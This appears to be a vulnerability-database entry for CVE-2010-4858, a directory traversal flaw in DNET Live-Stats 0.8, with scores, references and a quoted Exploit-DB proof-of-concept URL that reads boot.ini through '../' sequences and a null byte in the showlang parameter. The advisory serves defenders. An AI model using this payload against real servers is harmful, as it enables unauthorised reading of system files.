CVE-2010-4858
medium
CVSS v3
โ
CVSS v4 NEW
โ
VIR risk
6.0
Description
Directory traversal vulnerability in team.rc5-72.php in DNET Live-Stats 0.8 allows remote attackers to read arbitrary files via a .. (dot dot) in the showlang parameter.
Predictions
Exploit likelihood
20%
Patch ETA
โ
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
DNET Live-Stats 0.8 - Local File Inclusion
# Exploit Title: DNET Live-Stats 0.8 Local File Inclusion
# Date: 10-04-10
# Author: Blake
# Software Link: http://sourceforge.net/projects/dnetlivestats/files/0.8/dnet-live-stats-0.8-rc8.zip/download
# Version: 0.8 rc8
# Tested on: Windows XP SP3 running xampp lite
The showlang parameter does not properly sanitize user input.
POC:
http://127.0.0.1/dnet/team.rc5-72.php?showlang=../../../../../../../../../../../../boot.ini%00
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| joerg_risse | dnet_live-stats | 0.8 | |
References
- http://packetstormsecurity.org/1010-exploits/dnetlivestats-lfi.txt
- http://securityreason.com/securityalert/8417
- http://www.exploit-db.com/exploits/15204
- http://www.securityfocus.com/bid/43708
- http://packetstormsecurity.org/1010-exploits/dnetlivestats-lfi.txt
- http://securityreason.com/securityalert/8417
- http://www.exploit-db.com/exploits/15204
- http://www.securityfocus.com/bid/43708
CWEs
CWE-22
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.